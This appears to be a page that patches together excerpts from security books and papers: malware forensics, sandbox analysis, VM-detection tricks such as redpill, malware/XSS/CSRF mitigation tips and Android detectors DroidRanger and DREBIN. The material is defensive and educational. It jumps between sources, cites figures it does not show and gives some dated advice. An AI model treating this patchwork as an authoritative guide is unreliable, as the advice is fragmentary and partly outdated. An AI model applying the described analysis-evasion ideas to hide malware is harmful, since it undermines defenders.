Which type of antimalware software recognizes various characteristics of known malware files

Class Versus Individuating Characteristics

►

It is simply not possible to be familiar with every kind of malware in all of its various forms.

Best investigative effort will include a comparison of unknown malware with known samples, as well as the conduct of preliminary analysis designed not just to identify the specimen, but how best to interpret it.

Although libraries of malware samples currently exist in the form of antivirus programs and hash sets, these resources are far from comprehensive.

Individual investigators instead must find known samples to compare with evidence samples and focus on the characteristics of files found on the compromised computer to determine what tools the intruder used. Further, deeper examination of taxonomic and phylogenetic relationships between malware specimens may be relevant to classify a target specimen and determine if it belongs to a particular malware “family.”

Once an exemplar is found that resembles a given piece of digital evidence, it is possible to classify the sample. John Thornton describes this process well in “The General Assumptions and Rationale of Forensic Identification”:22

In the “identification” mode, the forensic scientist examines an item of evidence for the presence or absence of specific characteristics that have been previously abstracted from authenticated items. Identifications of this sort are legion, and are conducted in forensic laboratories so frequently and in connection with so many different evidence categories that the forensic scientist is often unaware of the specific steps that are taken in the process. It is not necessary that those authenticated items be in hand, but it is necessary that the forensic scientist have access to the abstracted information. For example, an obscure 19th Century Hungarian revolver may be identified as an obscure 19th Century Hungarian revolver, even though the forensic scientist has never actually seen one before and is unlikely ever to see one again. This is possible because the revolver has been described adequately in the literature and the literature is accessible to the scientist. Their validity rests on the application of established tests which have been previously determined to be accurate by exhaustive testing of known standard materials.

In the “comparison” mode, the forensic scientist compares a questioned evidence item with another item. This second item is a “known item.” The known item may be a standard reference item which is maintained by the laboratory for this purpose (e.g. an authenticated sample of cocaine), or it may be an exemplar sample which itself is a portion of the evidence in a case (e.g. a sample of broken glass or paint from a crime scene). This item must be in hand. Both questioned and known items are compared, characteristic by characteristic, until the examiner is satisfied that the items are sufficiently alike to conclude that they are related to one another in some manner.

In the comparison mode, the characteristics that are taken into account may or may not have been previously established. Whether they have been previously established and evaluated is determined primarily by (1) the experience of the examiner, and (2) how often that type of evidence is encountered. The forensic scientist must determine the characteristics to be before a conclusion can be reached. This is more easily said than achieved, and may require de novo research in order to come to grips with the significance of observed characteristics. For example, a forensic scientist compares a shoe impression from a crime scene with the shoes of a suspect. Slight irregularities in the tread design are noted, but the examiner is uncertain whether those features are truly individual characteristics unique to this shoe, or a mold release mark common to thousands of shoes produced by this manufacturer. Problems of this type are common in the forensic sciences, and are anything but trivial.

The source of a piece of malware is itself a unique characteristic that may differentiate one specimen from another.

Being able to show that a given sample of digital evidence originated on a suspect’s computer could be enough to connect the suspect with the crime.

The denial of service attack tools that were used to attack Yahoo! and other large Internet sites, for example, contained information useful in locating those sources of attacks.

As an example, IP addresses and other characteristics extracted from a distributed denial of service attack tool are shown in Fig. I.1.

The sanitized IP addresses at the end indicated where the command and control servers used by the malware were located on the Internet, and these command and control systems may have useful digital evidence on them.

Class characteristics may also establish a link between the intruder and the crime scene. For instance, the “t0rn” installation file contained a username and port number selected by the intruder shown in Fig. I.2.

If the same characteristics are found on other compromised hosts or on a suspect’s computer, these may be correlated with other evidence to show that the same intruder was responsible for all of the crimes and that the attacks were launched from the suspect’s computer. For instance, examining the computer with IP address 192.168.0.7 used to break into 192.168.0.3 revealed the following traces (Fig. I.3) that help establish a link.

Be aware that malware developers continue to find new ways to undermine forensic analysis. For instance, we have encountered the following antiforensic techniques in Linux malware (although this list is by no means exhaustive and will certainly develop with time):

Multicomponent

Conditional and obfuscated code

Packing and encryption

Detection of debuggers, disassemblers, and virtual environments

Stripping symbolic and debug information during the course of compiling an ELF file

A variety of tools and techniques are available to digital investigators to overcome these antiforensic measures, many of which are detailed in this book. Note that advanced antiforensic techniques require knowledge and programming skills that are beyond the scope of this book. More in-depth coverage of reverse engineering is available in The IDA Pro Book: The Unofficial Guide to the World’s Most Popular Disassembler.23

From Malware Analysis to Malware Forensics

靅 The blended malware threat has arrived; the need for in-depth, verifiable code analysis and formalized documentation has arisen, and a new forensic discipline has emerged.

▸ In the good old days, digital investigators could discover and analyze malicious code on computer systems with relative ease. UNIX rootkits like t0rnkit did little to undermine forensic analysis of the compromised system. Because the majority of malware functionality was easily observable, there was little need for a digital investigator to perform in-depth analysis of the code. In many cases, someone in the information security community would perform a basic functional analysis of a piece of malware and publish it on the Web.

▸ While the malware of yesteryear neatly fell into distinct categories based upon functionality and attack vector (viruses, worms, Trojan Horses), today’s malware specimens are often modular, multifaceted, and known as blended-threats because of their diverse functionality and means of propagation.47 And, as computer intruders become more cognizant of digital forensic techniques, malicious code is increasingly designed to obstruct meaningful analysis.

▸ By employing techniques that thwart reverse engineering, encode and conceal network traffic, and minimize the traces left on file systems, malicious code developers are making both discovery and forensic analysis more difficult. This trend started with kernel loadable rootkits on UNIX and has evolved into similar concealment methods on Windows and Linux systems.

▸ Today, various forms of malware are proliferating, automatically spreading (worm behavior), providing remote control access (Trojan horse/backdoor behavior), and sometimes concealing their activities on the compromised host (rootkit behavior). Furthermore, malware has evolved to pollute cross-platform, cloud, and BYOD environments; undermine security measures; disable anti-virus tools; and bypass firewalls by connecting from within the network to external command and control servers.

▸ One of the primary reasons that developers of malicious code are taking such extraordinary measures to protect their creations is that, once the functionality of malware has been decoded, digital investigators know what traces and patterns to look for on the compromised host and in network traffic. In fact, the wealth of information that can be extracted from malware has made it an integral and indispensable part of intrusion investigation and identity theft cases. In many cases, little evidence remains on the compromised host and the majority of useful investigative information lies in the malware itself.

▸ The growing importance of malware analysis in digital investigations, and the increasing sophistication of malicious code, has driven advances in tools and techniques for performing surgery and autopsies on malware. As more investigations rely on understanding and counteracting malware, the demand for formalization and supporting documentation has grown. The results of malware analysis must be accurate and verifiable, to the point that they can be relied on as evidence in an investigation or prosecution. As a result, malware analysis has become a forensic discipline—welcome to the era of malware forensics.

Sandbox Background

Sandboxes are a common tool in security/malware research; they allow the execution of unknown software in a controlled, restricted and monitored environment

CWSandbox is example of a sandbox tool for automatic behavior analysis of Windows executables; the functionality of a sandbox is achieved by taking the following steps:

The initial malware process is created by the starter application cwsandbox.exe.

cwmonitor.dll is injected into each monitored process.

The DLL installs API hooks for all important functions of the Windows API.

If a new process is started by the malware or an existing one is infected, this process is also monitored.

After a customizable time all monitored processes are terminated/stopped.

A high-level summarized analysis report is created of all the monitored actions.

The network traffic is examined, important Web protocols (HTTP, FTP, IRC, and so on) are recognized and all relevant protocol data is reported (username, password, and so on).

Existing Sandbox Implementations

Norman SandBox was developed by Norman AS. at http://sandbox.norman.no.

TTAnalyze was developed by Ulrich Bayer, Ikarus Software GmbH, in cooperation with the Technical University of Vienna.

In Chas Tomlin's Sandnet the malicious software is executed on a real Windows system, not on an emulated or simulated one.

Truman is tThe Reusable Unknown Malware Analysis Net, by Joe Stewart from LURHQ.

CWSandbox is from the diploma thesis of Carsten Willems.

Describing CWSandbox

CWSandbox is an application for the automatic behavior analysis of malware. This dynamic analysis is performed by executing the malicious application in a controlled environment and catching all relevant of its calls to the Windows API

CWSandbox is designed to attach reporting tools to malware. It is not designed to block malicious activity of the malware. You are responsible for blocking any outbound traffic that may result from executing the malware.

Malware may be able to detect the presence of a virtual environment by checking specific registry entries, the list of running processes or system services, or typical behavior of the system. Many detection methods are known for the popular VMware product. The website www.trapkit.de describes a lot of them and also offers the tools scoopy doo and jerry for that purpose. Joanna Rutkowska described a generic approach to VM detection which she called redpill. Redpill checks the IDT address retrieved when running in a virtual machine since it is different to that in a real system. This trick works with any virtualization software.

Sandbox technology can be extended to serve as a tool for automatic collection and analysis of malware, as in Automated Analysis Suite (AAS).

AAS uses a database to store malware samples and the corresponding created analysis reports

AAS integrates the honeypot tool Nepenthes for automatic malware collection

Additionally, malware can be submitted via a PHP-based Web interface

AAS embeds CWSandbox for automatic analysis.

Creating a Live DVD with VMware and CWSandbox

Once you have created a sandbox, you can turn that implementation into a bootable DVD so that you can take the sandbox into the field.or distribute the tool to a classroom of students to give them hands-on malware analysis experience.

Frequently Asked Questions

Q:

What kind of things can you find using sandbox technology?

You are only limited by the instruments that you attach to the malware. You can learn the ip addresses of FQDN of different members of a botnet, the identity of command and control servers, malicious code download servers, the nickname, userid and password of bot command and control servers, unpacked and unencrypted versions of stealth malware, the filenames of files that are part of the malicious system, a list of all files opened by the malware, and more.

I really like the Live DVD idea. How can I create my own Live-CDs and DVDs using other content?

A:Instructions for creating your own Live-CDs and DVDs can be found on howtoforge. We used a how-to written by Falko Timme, “Creating Your Own Custom Ubuntu 7.10 Or Linux Mint 4.0 Live-CD With Remastersys,” Copyright © 2008 HowtoForge.

What does virtualization do for Sandbox technology?

Virtualization makes it possible for a security investigator to try multiple tests on a malware sample without having to wipe the test system's hard drive between test sessions. Without virtualization, the measures to ensure integrity could be provided using reverting tools such as DeepFreeze, Partimage, or hardware restore solutions. The virtual environment permits investigators to create several members of a network to examine the interaction of a botnet.

I don't want to give away my licensed copies of Windows or Cwsandbox. How do I create a Live DVD that doesn't include my license keys?

You can use SYSPREP and the process located http://www.uea.ac.uk/itcs/software/xp/xp-sysprep.html to remove the product keys so that a new owner of the DVD can use their own product keys. If you created the image file after you install the sandbox but before you enter the license, then the new owner of the DVD will need to provide their own license or add a different sandbox product.

Notes

1

For more information go to http://sandbox.norman.no/pdf/03%20sandboxwhitepaper.pdf.

This utility saves/restores hard disc partitions in many formats to an image file (see www.partimage.org).

This tool is for resetting your computer to its original state (see www.faronics.com/html/deepfreeze.asp).

Right-click on free space on /dev/sda or /dev/had to create partitons in the free space.

Mitigating Malware

As we've learned, there is a vast variety of malware. The question is, “How can we protect ourselves?” The first and foremost way to protect ourselves is through knowledge. That's a pretty vague statement, isn't it? What is meant by this statement is to keep yourself up-to-date on the different malware currently running rampant. This can be accomplished by reading trade magazines, attending courses on hacking techniques, and frequenting sites such as CERT at www.cert.org, to name a few.

Knowledge is the first step in any defense. Malware becomes really interesting. There really are two types of malware we need to protect ourselves against. There is malware that is known and malware that isn't known. Protecting ourselves against known malware isn't all that complicated. We can utilize the following steps to protect ourselves against known malware. We will include some additional items for corporations:

Don't click on unknown links.

Never open e-mail attachments from people you don't know.

Do not accept friends you don't know.

Do not use applications you are not familiar with.

Ensure you configure your privacy settings.

Install and run antivirus software.

Keep antivirus software up-to-date with the latest signature updates.

All downloaded files should be scanned by antivirus software prior to opening it or running it.

Install and run antispyware software.

Keep the signature files for antispyware software up-to-date.

Utilize the most up-to-date patches for your software.

Do not use any storage media that has been used in another computer, unless you are certain the computer is free of viruses and will not pass the virus on to your system.

Install and run local firewalls on your desktops and laptops.

Additional items for corporations:

Implement a security awareness program.

Utilize network-based intrusion detection/prevention systems at entry points to your environment and around critical systems.

Utilize host-based intrusion detection/prevention software on your critical servers.

Utilize Web filtering proxies to limit the Web sites employees can visit.

Utilize Web malware filtering to scan traffic for malware and inappropriate links.

Limit the use of instant messaging software.

Limit the use of peer-to-peer networks.

This list is only a portion of the tools that can be used to protect a corporation. To truly implement security in a corporate environment, one will first need to create a security-to-policy that states the corporation's view on security.

Tip

It may be a little confusing to differentiate between malware detection software and antivirus software. Antivirus software is primarily utilized to scan a hard disk for viruses, worms, and Trojan horses, and removes, fixes, or isolates any threats that are found. Antispyware software scans your hard disk and registry for traces of spyware and adware and then either removes them or prompts the user to remove them. The real difference between antivirus and antispyware lies in what the software is looking for. Today antivirus software is offered with add-ons for antispyware, and antispyware software is offered with add-ons for antivirus. However, it is still recommended to install one antivirus software and a different antispyware software.

As simple and sensible as these protection mechanisms may seem, guess what? A good number of people still do not utilize them. What's harder to defend against is unknown malware. Unknown malware is just that malware that has not been discovered yet. These types of attacks are known as zero-day attacks. This means that no signatures exist for such antivirus and antispyware software. Also, once new malware has been detected, there is still a lag period between the time it is detected and when the signature is available. So, how can we protect ourselves against this unknown malware?

There are a multitude of methods and products that can be utilized in the defense of unknown malware. Some of the more common methods include the following:

Utilize network-based intrusion prevention systems.

Utilize host-based intrusion prevention software.

Restrict administrative rights.

Utilize products that can implement blacklist and whitelist. A blacklist is a list of sites that are not trusted, whereas a whitelist is a list of trusted sites.

Disable active content, such as activeX.

Utilize multiple versions of antivirus and antispyware software. What one vendor's software misses the other may detect.

Lock down USB ports. USB drives used on other devices may contain viruses.

Disable unneeded services. Attackers are aware of the different default services running on operating systems. They can use these services as a means of infecting a system. Disabling unneeded services will reduce one's chance of being infected.

Warning

Intrusion prevention systems use an anomaly-based method to detect zero-day attacks. The way this works is by placing the intrusion prevention system in what is commonly referred to as “learning mode.” During learning mode the system learns what the “normal” communications are in the environment. Once moved from “learn mode” to “protect mode,” the system will allow “normal” communications and prevent the anomaly traffic. This sounds good in theory; however, what the system considers “normal” communications may not be what your company considers “normal” communications. If this is the case, a large amount of company traffic could be blocked. So, when implementing intrusion prevention systems, the results of the learn mode should be reviewed and tweaked to match the actual “normal” traffic for your environment.

Once again, this list is only a list of some of the most common mitigation techniques. It is by no means an exhaustive list and should not be taken that way. Implementing these techniques will reduce the chance of infection; however, it will not eliminate the possibility. Nothing can ever guarantee that one will not become infected.

Mitigating Cross-Site Scripting Attacks

XSS is a very nasty attack technique. As mentioned earlier, a good amount of the mitigation of XSS resides with the social networks. However, we are not going to leave the end user hanging out to dry. There are still some things we can do to help protect ourselves. To begin with we need to do all of the following:

Disable scripting when it is not required.

Disable cookies.

Disable active content, such as activeX.

Do not ever trust links to other sites that you don't know if they are safe or not.

Do not ever trust links in e-mails that you don't know if they are safe or not.

Do not follow links from sites that lead to security-sensitive pages involving personal or business information unless you truly trust them.

Only access sites through their site directly and not through any third-party sites.

Utilize desktop firewalls.

Utilize host-based intrusion prevention software.

This list is just a list of the some of the things one can do to help reduce their risks of encountering an XSS attack. A company can help in mitigating XSS by performing the following:

Implement application layer firewalls.

Implement network-based intrusion prevention systems.

Implement Web content filters.

Disallow the use of instant messaging.

Implement application layer proxies.

Disallow the use of peer-to-peer software use.

Performing application vulnerability scans.

Performing application code reviews.

These are just mitigation techniques that can be utilized to reduce one's chance of being hit by an XSS attack. The unfortunate reality is that there is little the user can do, except by being smart about what they are doing. It really falls on the Web sites and social networks to make sure that they have reviewed their code for vulnerabilities, implemented the proper filters, and other mitigation techniques, such as application firewalls.

Mitigating Cross-Site Request Forgery Attacks

These are the worst types of attacks in some people's eyes. They are able to access information that you have opened in another browser, such as your bank account information. Guess what? Once again, unfortunately, there is not a whole lot we can do from the end user standpoint to protect ourselves. We can implement everything we discussed earlier, such as:

Not clicking on links we don't trust.

Not opening e-mail we did not expect to receive.

Disabling active content.

Disabling scripts.

There are a few additional items we can do in addition to all of the mitigation techniques we have already discussed:

Do not connect to other sites while being connected to your bank account.

Do not connect to other sites while being connected to your trading account.

Logout of the account.

Limit your time and activity on sites.

Log in to your accounts, get done what you need to, and then disconnect.

Once again, these are common sense items we should all follow. However, most of us have our Facebook, Twitter, MySpace, and bank account sites up all at the same time. Oh yeah, let's not forget that we opened another window to do some browsing. This is nothing more than a recipe for disaster.

Epic Fail

There was a friend, whose name we won't mention, that fell victim to a CSRF attack. This friend had implemented every security precaution you could think of, dual forms of antivirus and spyware protection, as well as desktop firewall with some host-based intrusion prevention options. However, this friend managed to lose $1,000.00. This friend was paying his bills through his online bank account when he received an e-mail from a friend telling him to check this site about a place they were going to visit. Little did either of them know that this site had a CSRF attack placed on it. When my friend visited the site, the attack proceeded and the money ended up being sent as a payment from his account to a company overseas for “services rendered.” He was able to get his money back by calling the fraud department and explaining what had happened. However, it took a while and was a really big pain. This just goes to show it can happen to anyone.

2.3.1 DroidRanger

The DroidRanger tool [33] detects the characteristic behaviors present in malware from several malicious families. It relies on a crawler to collect Android applications from existing Android markets and stores them in a local repository. For each application collected, DroidRanger extracts the fundamental properties associated with each application (requested permissions, author information, etc.) and organizes them into a central database.

DroidRanger performs two distinct detection processes. The first, for known malware, is based on a permission-based behavioral footprint. The second, for previously unknown malware, is based on a heuristic analysis of the app’s behavior, as reconstructed from the bytecode and the manifest file. Suspicious applications are then executed and monitored to verify if they actually display malicious behavior at runtime. If this is the case, the associated behavioral fingerprint will be extracted and included in the first detection process’ database.

This study was tested on the most popular applications of the year 2011, and yielded positive results. However, DroidRanger only covers free applications and only five Android markets, with a false negative rate of 4.2%.

2.3.2 DREBIN

Arp et al. created DREBIN [4], a tool that performs malware detection on the results of a static analysis of the applications. DREBIN’s feature set appears to be one of the most thorough of all the works we have surveyed. In all, they create 8 feature sets for each app, using data from the Android manifest file (including permissions, components and requested hardware), and from the decompiled .dex file (including selected API calls and network addresses). The entire feature set is constructed in linear time, without necessitating complex static analysis such as data flow analysis.

Detection is then performed using SVMs. In order to maintain a lightweight footprint on the end-users’ device, training is not performed on the smartphone itself. Instead, the classifier is trained offline, and the only resulting model is passed to the user. In order to provide explanations for its results, DREBIN’s classifier is trained not only to detect, but also to identify the features that lead to the application being flagged as malware. From these, DREBIN constructs a parametrized sentence that explain the reason of the verdict to the user.

DREBIN was tested using 131611 benign apps coming from the GooglePlay Store, as well as two other markets (one Chinese and one Russian), and 5560 malware samples from the Android Malware Genome Project [34]. It obtained a detection rate of 93%, with only 1% of false-positives, outperforming several anti-virus software on the same dataset.